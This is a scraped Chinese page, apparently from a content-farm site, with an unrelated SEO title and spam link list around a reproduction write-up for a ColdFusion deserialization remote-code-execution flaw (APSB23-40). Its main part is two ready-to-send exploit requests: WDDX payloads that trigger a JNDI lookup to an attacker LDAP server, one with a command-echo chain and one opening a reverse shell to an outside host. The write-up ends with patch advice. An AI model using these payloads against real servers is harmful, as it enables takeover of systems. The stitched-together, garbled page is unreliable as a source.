当前位置: 首页 > news >正文

asp做的网站如何发布竞价培训班

news 2025/9/18 13:56:16
asp做的网站如何发布,竞价培训班,北京知名大公司有哪些,西安logo设计0x01 产品简介 Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。 0x02 漏洞概述 Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击…

0x01 产品简介

      Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。

0x02 漏洞概述

     Adobe ColdFusion存在代码问题漏洞,该漏洞源于受到不受信任数据反序列化漏洞的影响,攻击者通过漏洞可以代码执行,可导致服务器失陷,获取服务器权限。

0x03 影响范围

    ColdFusion 2018 <= Update 16 

    ColdFusion 2021 <= Update 6 

    ColdFusion 2023 GA Release (2023.0.0.330468)

0x04 复现环境

 docker搭建ColdFusion 2023.0.0.330468漏洞环境

拉取镜像

docker pull vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

启动环境

docker run -d -P vulfocus/vcpe-1.0-a-adobe-coldfusion:2023.0.0.330468-openjdk-release

 PS:需确认8080对应的端口

验证是否可访问环境

0x05 漏洞复现

exp

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
cmd: idargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://your-ip:1389/Basic/TomcatEcho</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

PS:本次复现需要使用jndi漏洞利用工具(JNDIExploit-1.4-SNAPSHOT.jar)

TomcatEcho回显链

 开启监听

反弹shell

利用链:

POST /CFIDE/adminapi/base.cfc?method HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencodedargumentCollection=
<wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://vpsip:1389/Basic/ReverseShell/vpsip/6666</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data>
</wddxPacket>

 

 0x06 修复建议

根据影响版本中的信息,建议相关用户尽快更新至安全版本:

ColdFusion 2018 Update 17

ColdFusion 2021 Update 7

ColdFusion 2023 Update 1

下载链接请参考:

https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html

http://www.yayakq.cn/news/982759/

相关文章:

  • 精品资源共享课程网站建设在线安卓软件开发
  • 做网站app怎样做微信挂机平台网站
  • 做外贸面料哪个网站可以接单青海省网络公司
  • 工程建设标准下载网站广州做网站的公司
  • 郑州上海做网站的公司wordpress 改系统
  • wap网站技术python 做视频网站
  • 类似凡科网的网站网络技术服务公司经营范围
  • 怎么做自己的html网站哪里有学计算机培训班
  • 网站开发的历史wordpress恢复安装
  • 个人的网站建设的目的阳泉企业网站建设公司
  • 手机网站横竖屏顺德网站建设公司价位
  • 网站转化外包公司做的网站怎么改密码
  • 网站备案主体信息变更体育馆网站建设
  • 2016年两学一做教育网站网站开发的论文怎么写
  • 阿里云 个人网站 名称3322域名注册
  • 诸暨网站制作哪些公司制作有什么做网兼的网站
  • 乌海市建设局网站东莞网上推广怎么做
  • 电子商务网站建设与管理a网站开发工具软件
  • 南昌智能建站模板企业网站网页设计的步骤
  • 有域名了怎么建站天猫网站设计特点
  • 东营建设信息网站电话网络营销方式的优缺点
  • 网站开发周志如何在电商上购物网站
  • 网站建设部署与发布有效期莱芜招聘网
  • 免费网站建设凡科昆山网站建设秦皇岛
  • 县科协微网站建设网页源码怎么做网站
  • 成都个人网站制作公司电商网站开发定制
  • 营销网站建设流程农资网站建设
  • 微信做单网站wordpress媒体库是哪个文件夹
  • 韩国原生ip站群服务器企业建筑网站
  • 口碑好的做pc端网站分类网站模版